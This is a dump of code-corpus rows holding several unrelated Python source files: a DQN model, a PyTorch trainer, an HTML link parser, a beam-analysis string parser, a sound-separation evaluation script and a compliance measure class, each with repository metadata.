self.state = self.tracker.init(image, center, size, self.net)
def track(self, image_file):
image = cv2.imread(image_file)
if len(image.shape) == 2:
image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
self.state = self.tracker.track(self.state, image)
center = self.state["target_pos"]
size = self.state["target_sz"]
bbox = (center[0] - size[0] / 2, center[1] - size[1] / 2, size[0], size[1])
return bbox
| 34.5
| 85
| 0.628859
| 1,303
| 0.821046
| 0
| 0
| 0
| 0
| 0
| 0
| 84
| 0.05293
|
555695e92a72c35957e937841df7b620e7484601
| 3,346
|
py
|
Python
|
serpent/machine_learning/reinforcement_learning/rainbow_dqn/dqn.py
|
DylanSpicker/SerpentAI
|
c48c4b072e0d1084a52eac569ad1c7fa02ac7348
|
[
"MIT"
] | null | null | null |
serpent/machine_learning/reinforcement_learning/rainbow_dqn/dqn.py
|
DylanSpicker/SerpentAI
|
c48c4b072e0d1084a52eac569ad1c7fa02ac7348
|
[
"MIT"
] | null | null | null |
serpent/machine_learning/reinforcement_learning/rainbow_dqn/dqn.py
|
DylanSpicker/SerpentAI
|
c48c4b072e0d1084a52eac569ad1c7fa02ac7348
|
[
"MIT"
] | null | null | null |
import math
import torch
class DQN(torch.nn.Module):
def __init__(self, action_space, history=4, hidden_size=512, noisy_std=0.1, quantile=True):
super().__init__()
self.atoms = 200 if quantile else 51
self.action_space = action_space
self.quantile = quantile
self.conv1 = torch.nn.Conv2d(history, 32, 8, stride=4, padding=1)
self.conv2 = torch.nn.Conv2d(32, 64, 4, stride=2)
self.conv3 = torch.nn.Conv2d(64, 64, 3)
self.fc_h_v = NoisyLinear(5184, hidden_size, std_init=noisy_std)
self.fc_h_a = NoisyLinear(5184, hidden_size, std_init=noisy_std)
self.fc_z_v = NoisyLinear(hidden_size, self.atoms, std_init=noisy_std)
self.fc_z_a = NoisyLinear(hidden_size, action_space * self.atoms, std_init=noisy_std)
def forward(self, x):
x = torch.nn.functional.relu(self.conv1(x))
x = torch.nn.functional.relu(self.conv2(x))
x = torch.nn.functional.relu(self.conv3(x))
x = x.view(-1, 5184)
v = self.fc_z_v(torch.nn.functional.relu(self.fc_h_v(x)))
a = self.fc_z_a(torch.nn.functional.relu(self.fc_h_a(x)))
v, a = v.view(-1, 1, self.atoms), a.view(-1, self.action_space, self.atoms)
q = v + a - a.mean(1, keepdim=True)
if not self.quantile:
q = torch.nn.functional.softmax(q, dim=2)
return q
def reset_noise(self):
for name, module in self.named_children():
if "fc" in name:
module.reset_noise()
class NoisyLinear(torch.nn.Module):
def __init__(self, in_features, out_features, std_init=0.4):
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.std_init = std_init
self.weight_mu = torch.nn.Parameter(torch.empty(out_features, in_features))
self.weight_sigma = torch.nn.Parameter(torch.empty(out_features, in_features))
self.register_buffer("weight_epsilon", torch.empty(out_features, in_features))
self.bias_mu = torch.nn.Parameter(torch.empty(out_features))
self.bias_sigma = torch.nn.Parameter(torch.empty(out_features))
self.register_buffer("bias_epsilon", torch.empty(out_features))
self.reset_parameters()
self.reset_noise()
def reset_parameters(self):
mu_range = 1 / math.sqrt(self.in_features)
self.weight_mu.data.uniform_(-mu_range, mu_range)
self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.in_features))
self.bias_mu.data.uniform_(-mu_range, mu_range)
self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.out_features))
def reset_noise(self):
epsilon_in = self._scale_noise(self.in_features)
epsilon_out = self._scale_noise(self.out_features)
self.weight_epsilon.copy_(epsilon_out.ger(epsilon_in))
self.bias_epsilon.copy_(epsilon_out)
def forward(self, input):
if self.training:
return torch.nn.functional.linear(input, self.weight_mu + self.weight_sigma * self.weight_epsilon, self.bias_mu + self.bias_sigma * self.bias_epsilon)
else:
return torch.nn.functional.linear(input, self.weight_mu, self.bias_mu)
def _scale_noise(self, size):
x = torch.randn(size)
return x.sign().mul_(x.abs().sqrt_())
| 35.978495
| 162
| 0.661686
| 3,315
| 0.990735
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.010161
|
55572056018bf803954acf22ae96913928e3246d
| 1,479
|
py
|
Python
|
src/modules/base/url_helper.py
|
yakii9/artificial-programmer
|
a6c1a5a47155ee4d24be729a0fa8c86ca40f85d1
|
[
"MIT"
] | 1
|
2018-10-21T22:46:27.000Z
|
2018-10-21T22:46:27.000Z
|
src/modules/base/url_helper.py
|
yakii9/artificial-programmer
|
a6c1a5a47155ee4d24be729a0fa8c86ca40f85d1
|
[
"MIT"
] | 1
|
2018-10-29T04:34:13.000Z
|
2018-11-01T14:32:23.000Z
|
src/modules/base/url_helper.py
|
yakii9/artificial-programmer
|
a6c1a5a47155ee4d24be729a0fa8c86ca40f85d1
|
[
"MIT"
] | 1
|
2018-10-21T22:46:48.000Z
|
2018-10-21T22:46:48.000Z
|
import urllib.request
from html.parser import HTMLParser
from urllib import parse
from modules.base.handle_timeout import timeout
class ElementsFinder(HTMLParser):
def __init__(self, base_url, page_url):
super().__init__()
self.base_url = base_url
self.page_url = page_url
self.links = set()
# When we call HTMLParser feed() this function is called when it encounters an opening tag <a>
def handle_starttag(self, tag, attrs):
if tag == 'a':
for (attribute, value) in attrs:
if attribute == 'href':
url = parse.urljoin(self.base_url, value)
self.links.add(url)
def page_links(self):
return self.links
def error(self, message):
pass
class UrlHelper:
def __init__(self):
pass
@staticmethod
@timeout(6)
def get_html(url):
try:
with urllib.request.urlopen(url) as response:
html = response.read()
return html
except Exception as e:
print(e)
def get_domain_name(self, url):
try:
results = self.get_sub_domain_name(url).split('.')
return results[-2] + '.' + results[-1]
except:
return ''
# Get sub domain name (name.example.com)
@staticmethod
def get_sub_domain_name(url):
try:
return parse.urlparse(url).netloc
except:
return ''
| 25.067797
| 98
| 0.577417
| 1,343
| 0.908046
| 0
| 0
| 382
| 0.258283
| 0
| 0
| 153
| 0.103448
|
5557b931f8213b68a545c1e272d7bfa56dc0f55f
| 7,460
|
py
|
Python
|
trainer/trainer.py
|
iprapas/dl-continuous-deployment
|
bcee578a8ae3aa74e4ede00d125cb456f6a3010e
|
[
"MIT"
] | null | null | null |
trainer/trainer.py
|
iprapas/dl-continuous-deployment
|
bcee578a8ae3aa74e4ede00d125cb456f6a3010e
|
[
"MIT"
] | null | null | null |
trainer/trainer.py
|
iprapas/dl-continuous-deployment
|
bcee578a8ae3aa74e4ede00d125cb456f6a3010e
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from torchvision.utils import make_grid
from base import BaseTrainer
from utils import inf_loop, MetricTracker, confusion_matrix_image
import copy
import sys
import time
from model.metric import Accuracy, TopkAccuracy
def get_top_k(x, ratio):
"""it will sample the top 1-ratio of the samples."""
x_data = x.view(-1)
x_len = x_data.nelement()
top_k = max(1, int(x_len * (1 - ratio)))
# get indices and the corresponding values
if top_k == 1:
_, selected_indices = torch.max(x_data.abs(), dim=0, keepdim=True)
else:
_, selected_indices = torch.topk(
x_data.abs(), top_k, largest=True, sorted=False
)
return x_data[selected_indices], selected_indices
def get_mask(flatten_arr, indices):
mask = torch.zeros_like(flatten_arr)
mask[indices] = 1
mask = mask.bool()
return mask.float(), (~mask).float()
class Trainer(BaseTrainer):
"""
Trainer class
"""
def __init__(self, model, criterion, metric_ftns, optimizer, config, data_loader,
valid_data_loader=None, lr_scheduler=None, len_epoch=None):
super().__init__(model, criterion, metric_ftns, optimizer, config)
self.config = config
self.data_loader = data_loader
if len_epoch is None:
# epoch-based training
self.len_epoch = len(self.data_loader)
else:
# iteration-based training
self.data_loader = inf_loop(data_loader)
self.len_epoch = len_epoch
self.valid_data_loader = valid_data_loader
self.do_validation = self.valid_data_loader is not None
self.lr_scheduler = lr_scheduler
self.log_step = int(np.sqrt(data_loader.batch_size))
self.deployed_model = copy.deepcopy(self.model)
self.init_model = copy.deepcopy(self.model)
self.init_model.eval()
self.deployed_model.eval()
self.accuracy = Accuracy()
self.topkaccuracy = TopkAccuracy()
self.train_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)
self.valid_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)
def _train_epoch(self, epoch):
"""
Training logic for an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains average loss and metric in this epoch.
"""
start = time.time()
self.model.train()
total_batch = 0
self.train_metrics.reset()
training_time = 0
for batch_idx, (data, target) in enumerate(self.data_loader):
data, target = data.to(self.device), target.to(self.device)
batch_start = time.time()
self.optimizer.zero_grad()
output = self.model(data)
loss = self.criterion(output, target)
loss.backward()
self.optimizer.step()
training_time += time.time() - batch_start
self.writer.set_step((epoch - 1) * self.len_epoch + batch_idx)
self.train_metrics.update('loss', loss.item())
for met in self.metric_ftns:
self.train_metrics.update(met.__name__, met(output, target))
total_batch += time.time() - batch_start
if batch_idx % self.log_step == 0:
self.logger.info('Train Epoch: {} {} Loss: {:.6f} Time per batch (ms) {}'.format(
epoch,
self._progress(batch_idx),
loss.item(), total_batch * 1000 / (batch_idx + 1)))
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
# valid_log = self._valid_deployed(batch_idx)
# print logged informations to the screen
# for key, value in valid_log.items():
# self.logger.info('Valid deployed {:15s}: {}'.format(str(key), value))
if batch_idx == self.len_epoch:
break
log = self.train_metrics.result()
if self.do_validation:
val_log = self._valid_epoch(epoch)
log.update(**{'val_' + k: v for k, v in val_log.items()})
log['time (sec)'] = time.time() - start
log['training_time'] = training_time
if self.lr_scheduler is not None:
self.lr_scheduler.step()
return log
def _valid_epoch(self, epoch):
"""
Validate after training an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.model.eval()
self.valid_metrics.reset()
avg_loss =0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (data, target) in enumerate(self.valid_data_loader):
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
avg_loss += loss.item()/len(self.valid_data_loader)
pred = torch.argmax(output, dim=1)
correct += torch.sum(pred == target).item()
total += len(target)
self.writer.set_step(epoch, 'valid')
self.writer.add_scalar('loss', avg_loss)
self.writer.add_scalar('accuracy', correct/total)
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
# add histogram of model parameters to the tensorboard
# for name, p in self.model.named_parameters():
# self.writer.add_histogram(name, p, bins='auto')
return self.valid_metrics.result()
def _valid_deployed(self, batch):
"""
Validate after training a batch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.deployed_model.eval()
self.valid_metrics.reset()
with torch.no_grad():
for batch_idx, (data, target) in enumerate(self.valid_data_loader):
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
self.writer.set_step((batch - 1) * len(self.valid_data_loader) + batch_idx*len(target), 'valid')
self.valid_metrics.update('loss', loss.item())
for met in self.metric_ftns:
self.valid_metrics.update(met.__name__, met)
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
return self.valid_metrics.result()
def _progress(self, batch_idx):
base = '[{}/{} ({:.0f}%)]'
if hasattr(self.data_loader, 'n_samples'):
current = batch_idx * self.data_loader.batch_size
total = self.data_loader.n_samples
else:
current = batch_idx
total = self.len_epoch
return base.format(current, total, 100.0 * current / total)
| 38.061224
| 112
| 0.604826
| 6,541
| 0.87681
| 0
| 0
| 0
| 0
| 0
| 0
| 1,727
| 0.231501
|
555ab459155bc7618fd3e853eed5270201c2705f
| 341
|
py
|
Python
|
eoa.py
|
LDNN97/evolutionary-optimization-algorithm
|
5819ab759ecc1fee94a03e407c97f2ab7bd0f862
|
[
"MIT"
] | 21
|
2019-03-12T14:48:36.000Z
|
2022-03-08T12:55:30.000Z
|
eoa.py
|
LDNN97/Evolutionary-Optimization-Algorithms
|
5819ab759ecc1fee94a03e407c97f2ab7bd0f862
|
[
"MIT"
] | null | null | null |
eoa.py
|
LDNN97/Evolutionary-Optimization-Algorithms
|
5819ab759ecc1fee94a03e407c97f2ab7bd0f862
|
[
"MIT"
] | 5
|
2021-02-17T08:33:39.000Z
|
2022-01-23T11:44:16.000Z
|
from prob.problems import *
from opti.de import DE
from opti.cmaes import CMAES
from opti.cmaes_origin import CMAESO
from opti.cmaes_maes import CMAESM
from opti.cmaes_large import CMAESL
# beta
from opti.cmaes_bipop import CMAESB
if __name__ == "__main__":
TaskProb = Sphere(50, -50, 50)
Task = DE(TaskProb, 1000)
Task.run()
| 21.3125
| 36
| 0.747801
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.046921
|
555da31cec0240cea59e597af6f6196956ec03f6
| 574
|
py
|
Python
|
tests/test_common.py
|
shikanon/BaiduMapAPI
|
36c41bd99e523fa231e7d654f0ba504349b2a7ad
|
[
"MIT"
] | 7
|
2019-03-07T04:38:44.000Z
|
2021-04-23T02:43:10.000Z
|
tests/test_common.py
|
shikanon/BaiduMapAPI
|
36c41bd99e523fa231e7d654f0ba504349b2a7ad
|
[
"MIT"
] | 2
|
2020-03-24T16:47:11.000Z
|
2020-12-03T08:52:31.000Z
|
tests/test_common.py
|
shikanon/BaiduMapAPI
|
36c41bd99e523fa231e7d654f0ba504349b2a7ad
|
[
"MIT"
] | 1
|
2019-10-22T07:21:58.000Z
|
2019-10-22T07:21:58.000Z
|
from BaiduMapAPI.common import convertCoord, expandUp
import pytest
def test_convertCoord():
coord = convertCoord("12.32323,56.23422")
assert coord == "12.32323,56.23422"
coord = convertCoord((12.32323,56.23422))
assert coord == "12.32323,56.23422"
def test_expandUp():
test_dict = {"a" : "A", "b":{"bB": [{"Ba": 2}, "Bb", "Bc"], "bc": {"bcd":{"bcd": 4}}}}
testValue = expandUp(test_dict, "test")
assert testValue == {'test_a': 'A', 'test_b_bB_0_Ba': 2, 'test_b_bB_1': 'Bb',
'test_b_bB_2': 'Bc', 'test_b_bc_bcd_bcd': 4}
| 41
| 90
| 0.606272
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 182
| 0.317073
|
555e8fe1a5ae17b4fbc51d4ad0090a37d1dc68ba
| 3,520
|
py
|
Python
|
pycba/utils.py
|
mayermelhem/pycba
|
8f6a0da12629bac2ad1c6c8e113357f96931ef17
|
[
"Apache-2.0"
] | 10
|
2022-02-07T01:16:02.000Z
|
2022-03-12T07:56:43.000Z
|
pycba/utils.py
|
mayermelhem/pycba
|
8f6a0da12629bac2ad1c6c8e113357f96931ef17
|
[
"Apache-2.0"
] | 5
|
2022-02-08T07:42:53.000Z
|
2022-03-31T21:33:42.000Z
|
pycba/utils.py
|
mayermelhem/pycba
|
8f6a0da12629bac2ad1c6c8e113357f96931ef17
|
[
"Apache-2.0"
] | 1
|
2022-02-12T04:33:38.000Z
|
2022-02-12T04:33:38.000Z
|
"""
PyCBA - Utility functions for interacting with PyCBA
"""
import re
import numpy as np
from typing import Tuple
def parse_beam_string(
beam_string: str,
) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
"""
This function parses a beam descriptor string and returns CBA input vectors.
The beam descriptor string uses a specific format: spans lengths in float are
separated by single characters describing the terminals of that beam element.
The terminal characters are:
- P - pinned (effectively the same as roller, but retained for visualisations)
- R - roller (can occur at any terminal)
- E - encastre (i.e. fully-fixed) - can only occur at beam extremity
- F - free (e.g. cantilever end) - can only occur at beam extremity
- H - hinge - can only occur internally in the beam
Examples of beam strings are:
- *P40R20R* - 2-span, 60 m long, with pinned-roller-roller supports
- *E20H30R10F* - 3-span, 60 m long, encastre-hinge-roller-free
**Complex beam configurations may not be describable using the beam string.**
The function returns a tuple containing the necessary beam inputs for
:class:`pycba.analysis.BeamAnalysis`: `(L, EI, R, eType)`
Parameters
----------
beam_string :
The string to be parsed.
Raises
------
ValueError
When the beam string does not meet basic structural requirements.
Returns
-------
(L, EI, R, eType) : tuple(np.ndarray, np.ndarray, np.ndarray, np.ndarray)
In which:
- `L` is a vector of span lengths.
- `EI` is A vector of member flexural rigidities (prismatic).
- `R` is a vector describing the support conditions at each member end.
- `eType` is a vector of the member types.
Example
-------
This example creates a four-span beam with fixed extreme supports and
an internal hinge. ::
beam_str = "E30R30H30R30E"
(L, EI, R, eType) = cba.parse_beam_string(beam_str)
ils = cba.InfluenceLines(L, EI, R, eType)
ils.create_ils(step=0.1)
ils.plot_il(0.0, "R")
"""
beam_string = beam_string.lower()
terminals = re.findall(r"[efhpr]", beam_string)
spans_str = [m.end() for m in re.finditer(r"[efhpr]", beam_string)]
if len(terminals) < 2:
raise ValueError("At least two terminals must be defined")
if terminals[0] == "h" or terminals[-1] == "h":
raise ValueError("Cannot have a hinge at an extremity")
if len(terminals) > 2:
if any(t == "f" or t == "e" for t in terminals[1:-1]):
raise ValueError("Do not define internal free or encastre terminals")
# Get and check the span lengths
L = [
float(beam_string[spans_str[i] : spans_str[i + 1] - 1])
for i in range(len(spans_str) - 1)
]
if len(terminals) - 1 != len(L):
raise ValueError("Inconsistent terminal count and span count")
EI = 30 * 1e10 * np.ones(len(L)) * 1e-6 # kNm2 - arbitrary value
R = []
eType = [1 for l in L]
for i, t in enumerate(terminals):
if t == "p" or t == "r": # pin or roller
R.append([-1, 0])
elif t == "e": # encastre
R.append([-1, -1])
elif t == "f": # free
R.append([0, 0])
elif t == "h": # hinge
R.append([0, 0])
eType[i - 1] = 2
R = [elem for sublist in R for elem in sublist]
return (L, EI, R, eType)
| 34.174757
| 86
| 0.605682
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,326
| 0.660795
|
555f6946d9a27cac92dae44e27d4220ecfaf6269
| 10,363
|
py
|
Python
|
models/dcase2020_fuss_baseline/evaluate_lib.py
|
marciopuga/sound-separation
|
0b23ae22123b041b9538295f32a92151cb77bff9
|
[
"Apache-2.0"
] | 412
|
2020-03-03T05:55:53.000Z
|
2022-03-29T20:49:11.000Z
|
models/dcase2020_fuss_baseline/evaluate_lib.py
|
marciopuga/sound-separation
|
0b23ae22123b041b9538295f32a92151cb77bff9
|
[
"Apache-2.0"
] | 12
|
2020-04-09T17:47:01.000Z
|
2022-03-22T06:07:04.000Z
|
models/dcase2020_fuss_baseline/evaluate_lib.py
|
marciopuga/sound-separation
|
0b23ae22123b041b9538295f32a92151cb77bff9
|
[
"Apache-2.0"
] | 89
|
2020-03-06T08:26:44.000Z
|
2022-03-31T11:36:23.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluate separated audio from a DCASE 2020 task 4 separation model."""
import os
import numpy as np
import pandas as pd
import tensorflow.compat.v1 as tf
import inference
from train import data_io
from train import metrics
from train import permutation_invariant
def _weights_for_nonzero_refs(source_waveforms):
"""Return shape (source,) weights for signals that are nonzero."""
source_norms = tf.sqrt(tf.reduce_mean(tf.square(source_waveforms), axis=-1))
return tf.greater(source_norms, 1e-8)
def _weights_for_active_seps(power_sources, power_separated):
"""Return (source,) weights for active separated signals."""
min_power = tf.reduce_min(power_sources, axis=-1, keepdims=True)
return tf.greater(power_separated, 0.01 * min_power)
def compute_metrics(source_waveforms, separated_waveforms, mixture_waveform):
"""Permutation-invariant SI-SNR, powers, and under/equal/over-separation."""
# Align separated sources to reference sources.
perm_inv_loss = permutation_invariant.wrap(
lambda tar, est: -metrics.signal_to_noise_ratio_gain_invariant(est, tar))
_, separated_waveforms = perm_inv_loss(source_waveforms[tf.newaxis],
separated_waveforms[tf.newaxis])
separated_waveforms = separated_waveforms[0] # Remove batch axis.
# Compute separated and source powers.
power_separated = tf.reduce_mean(separated_waveforms ** 2, axis=-1)
power_sources = tf.reduce_mean(source_waveforms ** 2, axis=-1)
# Compute weights for active (separated, source) pairs where source is nonzero
# and separated power is above threshold of quietest source power - 20 dB.
weights_active_refs = _weights_for_nonzero_refs(source_waveforms)
weights_active_seps = _weights_for_active_seps(
tf.boolean_mask(power_sources, weights_active_refs), power_separated)
weights_active_pairs = tf.logical_and(weights_active_refs,
weights_active_seps)
# Compute SI-SNR.
sisnr_separated = metrics.signal_to_noise_ratio_gain_invariant(
separated_waveforms, source_waveforms)
num_active_refs = tf.reduce_sum(tf.cast(weights_active_refs, tf.int32))
num_active_seps = tf.reduce_sum(tf.cast(weights_active_seps, tf.int32))
num_active_pairs = tf.reduce_sum(tf.cast(weights_active_pairs, tf.int32))
sisnr_mixture = metrics.signal_to_noise_ratio_gain_invariant(
tf.tile(mixture_waveform[tf.newaxis], (source_waveforms.shape[0], 1)),
source_waveforms)
# Compute under/equal/over separation.
under_separation = tf.cast(tf.less(num_active_seps, num_active_refs),
tf.float32)
equal_separation = tf.cast(tf.equal(num_active_seps, num_active_refs),
tf.float32)
over_separation = tf.cast(tf.greater(num_active_seps, num_active_refs),
tf.float32)
return {'sisnr_separated': sisnr_separated,
'sisnr_mixture': sisnr_mixture,
'sisnr_improvement': sisnr_separated - sisnr_mixture,
'power_separated': power_separated,
'power_sources': power_sources,
'under_separation': under_separation,
'equal_separation': equal_separation,
'over_separation': over_separation,
'weights_active_refs': weights_active_refs,
'weights_active_seps': weights_active_seps,
'weights_active_pairs': weights_active_pairs,
'num_active_refs': num_active_refs,
'num_active_seps': num_active_seps,
'num_active_pairs': num_active_pairs}
def _report_score_stats(metric_per_source_count, label='', counts=None):
"""Report mean and std dev for specified counts."""
values_all = []
if counts is None:
counts = metric_per_source_count.keys()
for count in counts:
values = metric_per_source_count[count]
values_all.extend(list(values))
return '%s for count(s) %s = %.1f +/- %.1f dB' % (
label, counts, np.mean(values_all), np.std(values_all))
def evaluate(checkpoint_path, metagraph_path, data_list_path, output_path):
"""Evaluate a model on FUSS data."""
model = inference.SeparationModel(checkpoint_path, metagraph_path)
file_list = data_io.read_lines_from_file(data_list_path, skip_fields=1)
with model.graph.as_default():
dataset = data_io.wavs_to_dataset(file_list, batch_size=1,
num_samples=160000,
repeat=False)
# Strip batch and mic dimensions.
dataset['receiver_audio'] = dataset['receiver_audio'][0, 0]
dataset['source_images'] = dataset['source_images'][0, :, 0]
# Separate with a trained model.
i = 1
max_count = 4
dict_per_source_count = lambda: {c: [] for c in range(1, max_count + 1)}
sisnr_per_source_count = dict_per_source_count()
sisnri_per_source_count = dict_per_source_count()
under_seps = []
equal_seps = []
over_seps = []
df = None
while True:
try:
waveforms = model.sess.run(dataset)
except tf.errors.OutOfRangeError:
break
separated_waveforms = model.separate(waveforms['receiver_audio'])
source_waveforms = waveforms['source_images']
if np.allclose(source_waveforms, 0):
print('WARNING: all-zeros source_waveforms tensor encountered.'
'Skiping this example...')
continue
metrics_dict = compute_metrics(source_waveforms, separated_waveforms,
waveforms['receiver_audio'])
metrics_dict = {k: v.numpy() for k, v in metrics_dict.items()}
sisnr_sep = metrics_dict['sisnr_separated']
sisnr_mix = metrics_dict['sisnr_mixture']
sisnr_imp = metrics_dict['sisnr_improvement']
weights_active_pairs = metrics_dict['weights_active_pairs']
# Create and initialize the dataframe if it doesn't exist.
if df is None:
# Need to create the dataframe.
columns = []
for metric_name, metric_value in metrics_dict.items():
if metric_value.shape:
# Per-source metric.
for i_src in range(1, max_count + 1):
columns.append(metric_name + '_source%d' % i_src)
else:
# Scalar metric.
columns.append(metric_name)
columns.sort()
df = pd.DataFrame(columns=columns)
if output_path.endswith('.csv'):
csv_path = output_path
else:
csv_path = os.path.join(output_path, 'scores.csv')
# Update dataframe with new metrics.
row_dict = {}
for metric_name, metric_value in metrics_dict.items():
if metric_value.shape:
# Per-source metric.
for i_src in range(1, max_count + 1):
row_dict[metric_name + '_source%d' % i_src] = metric_value[i_src - 1]
else:
# Scalar metric.
row_dict[metric_name] = metric_value
new_row = pd.Series(row_dict)
df = df.append(new_row, ignore_index=True)
# Store metrics per source count and report results so far.
under_seps.append(metrics_dict['under_separation'])
equal_seps.append(metrics_dict['equal_separation'])
over_seps.append(metrics_dict['over_separation'])
sisnr_per_source_count[metrics_dict['num_active_refs']].extend(
sisnr_sep[weights_active_pairs].tolist())
sisnri_per_source_count[metrics_dict['num_active_refs']].extend(
sisnr_imp[weights_active_pairs].tolist())
print('Example %d: SI-SNR sep = %.1f dB, SI-SNR mix = %.1f dB, '
'SI-SNR imp = %.1f dB, ref count = %d, sep count = %d' % (
i, np.mean(sisnr_sep), np.mean(sisnr_mix),
np.mean(sisnr_sep - sisnr_mix), metrics_dict['num_active_refs'],
metrics_dict['num_active_seps']))
if not i % 20:
# Report mean statistics and save csv every so often.
lines = [
'Metrics after %d examples:' % i,
_report_score_stats(sisnr_per_source_count, 'SI-SNR',
counts=[1]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[2]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[3]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[4]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[2, 3, 4]),
'Under separation: %.2f' % np.mean(under_seps),
'Equal separation: %.2f' % np.mean(equal_seps),
'Over separation: %.2f' % np.mean(over_seps),
]
print('')
for line in lines:
print(line)
with open(csv_path.replace('.csv', '_summary.txt'), 'w+') as f:
f.writelines([line + '\n' for line in lines])
print('\nWriting csv to %s.\n' % csv_path)
df.to_csv(csv_path)
i += 1
# Report final mean statistics.
lines = [
'Final statistics:',
_report_score_stats(sisnr_per_source_count, 'SI-SNR',
counts=[1]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[2]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[3]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[4]),
_report_score_stats(sisnri_per_source_count, 'SI-SNRi',
counts=[2, 3, 4]),
'Under separation: %.2f' % np.mean(under_seps),
'Equal separation: %.2f' % np.mean(equal_seps),
'Over separation: %.2f' % np.mean(over_seps),
]
print('')
for line in lines:
print(line)
with open(csv_path.replace('.csv', '_summary.txt'), 'w+') as f:
f.writelines([line + '\n' for line in lines])
# Write final csv.
print('\nWriting csv to %s.' % csv_path)
df.to_csv(csv_path)
| 41.618474
| 80
| 0.666795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,872
| 0.27714
|
5560d79a769a8dcd00036d30ac155bdbbb8657ae
| 422
|
py
|
Python
|
homeassistant/components/system_bridge/const.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 11
|
2018-02-16T15:35:47.000Z
|
2020-01-14T15:20:00.000Z
|
homeassistant/components/system_bridge/const.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 87
|
2020-07-06T22:22:54.000Z
|
2022-03-31T06:01:46.000Z
|
homeassistant/components/system_bridge/const.py
|
Vaarlion/core
|
f3de8b9f28de01abf72c0f5bb0b457eb1841f201
|
[
"Apache-2.0"
] | 11
|
2020-12-16T13:48:14.000Z
|
2022-02-01T00:28:05.000Z
|
"""Constants for the System Bridge integration."""
import asyncio
from aiohttp.client_exceptions import (
ClientConnectionError,
ClientConnectorError,
ClientResponseError,
)
from systembridge.exceptions import BridgeException
DOMAIN = "system_bridge"
BRIDGE_CONNECTION_ERRORS = (
asyncio.TimeoutError,
BridgeException,
ClientConnectionError,
ClientConnectorError,
ClientResponseError,
)
| 21.1
| 51
| 0.779621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 65
| 0.154028
|
55652d01d18ec68adf27b069baae8bf7ed3db2f4
| 1,705
|
py
|
Python
|
python/domain/compliance/model/measure.py
|
ICTU/document-as-code
|
e65fddb94513e7c2f54f248b4ce69e9e10ce42f5
|
[
"Apache-2.0"
] | 2
|
2021-01-09T17:00:51.000Z
|
2021-02-19T09:35:26.000Z
|
python/domain/compliance/model/measure.py
|
ICTU/document-as-code
|
e65fddb94513e7c2f54f248b4ce69e9e10ce42f5
|
[
"Apache-2.0"
] | null | null | null |
python/domain/compliance/model/measure.py
|
ICTU/document-as-code
|
e65fddb94513e7c2f54f248b4ce69e9e10ce42f5
|
[
"Apache-2.0"
] | 1
|
2020-02-24T15:50:05.000Z
|
2020-02-24T15:50:05.000Z
|
"""
BIO measure - defines and describes a measure for BIO compliance
"""
from domain.base import Base
class Measure(Base):
""" Measures that help to in BIO compliance. """
_explain = None
_not_applicable = None
def __init__(self, identifier, description, identifiers, url=None, done=False):
super().__init__(identifier)
self.description = description
self.identifiers = identifiers
self.url = url
self.done = done
def set_explain(self):
self.register_explain(self)
return self
def set_not_applicable(self):
self.register_not_applicable(self)
return self
# ---
@classmethod
def all_applicable_to_fragment(cls, fragment_identifier):
return [
bir_measure
for bir_measure in cls.all
for identifier in bir_measure.identifiers
if fragment_identifier.startswith(identifier)
]
# --- class property explain (rw) ---
@classmethod
def register_explain(cls, explain):
if not isinstance(explain, cls):
raise TypeError(f"explain should be {cls.__name__}, not {explain.__class__.__name__}")
cls._explain = explain
@classmethod
def explain(cls):
return cls._explain
# --- class property not_applicable (rw) ---
@classmethod
def register_not_applicable(cls, not_applicable):
if not isinstance(not_applicable, cls):
raise TypeError(f"not_applicable should be {cls.__name__}, not {not_applicable.__class__.__name__}")
cls._not_applicable = not_applicable
@classmethod
def not_applicable(cls):
return cls._not_applicable
| 26.640625
| 112
| 0.652199
| 1,596
| 0.93607
| 0
| 0
| 909
